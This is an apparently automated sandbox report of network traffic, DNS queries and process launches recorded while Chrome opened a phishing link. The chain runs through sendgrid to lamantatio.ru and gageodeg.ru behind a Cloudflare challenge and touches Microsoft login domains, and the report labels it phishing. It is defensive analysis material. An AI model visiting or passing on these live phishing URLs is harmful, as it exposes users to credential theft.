Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gimd.lamantatio.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gimd.lamantatio.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gimd.lamantatio.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gimd.lamantatio.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fdce2128ada41f5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gimd.lamantatio.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gimd.lamantatio.ru/ZSei/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpxTVJPTzNTN2hiYzRLdXVvaEsyakE9PSIsInZhbHVlIjoiTmhjQ0RaL0hVSVdBTG9zRTc2Z2M2T2UzdFVqcWxKdUIwWWZqYzFqY29OSUNEcjltOEwyQ2FtdzkrR0ZERjFQc0toSlN1eWoyODhvdTlXWEkybkNHeFB4Ny92QnM0UHNSWEZaZEg2M05MQTgvQWxrUDdTejg1RFFWWjU3WDJMRXIiLCJtYWMiOiJmZDRlMTU4OTI1MzEzYmE5MjYzMWFjYTFhOWRkYTYyNTgwMzA3NTM1ZTE1YTUxMmRhMjQ0NzczY2Y2ZDRlOGU2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdoMDY4M2FLeWhzMWp1VlVWd1NpQUE9PSIsInZhbHVlIjoiVHdTWVo3QWh2WEZWNjBpcmsxMnNDMmVqaWM2UWRHdmhIT1ZNOW5TOXJHM1BWZlFsYnZWNkdrbDkzNjJseU96dW9SNGppVEVvV0hBUVVKMEJRSUp6clF0UWZKcE1jN09vL0k0Ly9kRlI2bGw4Y3JaMEgvaitaNWFQWk9VN0V2YmUiLCJtYWMiOiI2YTlhZDkxODg3M2MzOTk1ZmY5YWZlMmYwZTlmNWMwYmU2MWE4NTFjN2VlMTQ3OWIyODNhMDk2ZDE1ZDAyYzkwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fdce2128ada41f5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fdce2128ada41f5/1736178831075/-I52yKHnGnwtVFm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fdce2128ada41f5/1736178831075/-I52yKHnGnwtVFm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fdce2128ada41f5/1736178831078/8700c439989e41dbd7c97c2a7e7c33cbc8c768735eb04740b5da280789dc698f/6I2B-pjWRaBgr7q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aRfKqGivICwMfkvMblhotmkCKTJPGIIMLUXKGZWRHMEJQTKQBBOQYFNUUNOTELHTTCK HTTP/1.1Host: xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://gimd.lamantatio.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gimd.lamantatio.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aRfKqGivICwMfkvMblhotmkCKTJPGIIMLUXKGZWRHMEJQTKQBBOQYFNUUNOTELHTTCK HTTP/1.1Host: xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: u1427642.ct.sendgrid.net
Source: global trafficDNS traffic detected: DNS query: xre.wzr.mybluehostin.me
Source: global trafficDNS traffic detected: DNS query: gimd.lamantatio.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3162sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: .wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:53:31 GMTServer: nginx/1.25.5Content-Type: text/html; charset=iso-8859-1Content-Length: 315<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:53:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdpIZKKqqx11o5ZVaW2tlnX59dKgCqnlnHzP4yrnJFctlnFm6CCmxAPzbb3NWKTe0e4MkC6pxUuwDvB1NxeaHuGeXHA%2FyJFM2iGDrQNYv%2FXKl%2FuquQXc2I8Fgo7fLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1222&min_rtt=1215&rtt_var=471&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1353&delivery_rate=2230227&cwnd=252&unsent_bytes=0&cid=532cbb5da6e4db82&ts=401&x=0"CF-Cache-Status: HITAge: 12675Server: cloudflareCF-RAY: 8fdce21a4af11875-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1679&rtt_var=639&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1898&delivery_rate=1700640&cwnd=153&unsent_bytes=0&cid=4d4c868f66a50e1f&ts=3882&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:53:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: i+2Vb7WTuRwHoYydqwgJoghxVNpx/As2F8k=$LTOnzyBqwXiRhOercache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fdce224befdc328-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:53:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: TuZYT29krw2zK4obb9X8CNYaexyzbo7vySA=$Qc1aoGWssBOC36DlServer: cloudflareCF-RAY: 8fdce23f0aae1a34-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:54:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: sg2z5G/nMJiKEHC2Sd9CpvzYoY7gvtt+4Ro=$A+Ov2lUDxi9Zw4ymcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fdce272e8727279-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_78.2.drString found in binary or memory: https://hello.com#X
Source: chromecache_78.2.drString found in binary or memory: https://hello.com#Xuser
Source: chromecache_75.2.dr, chromecache_85.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_75.2.dr, chromecache_85.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal68.phis.win@22/74@36/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2208,i,4042262563919958383,11686839205852121659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2208,i,4042262563919958383,11686839205852121659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
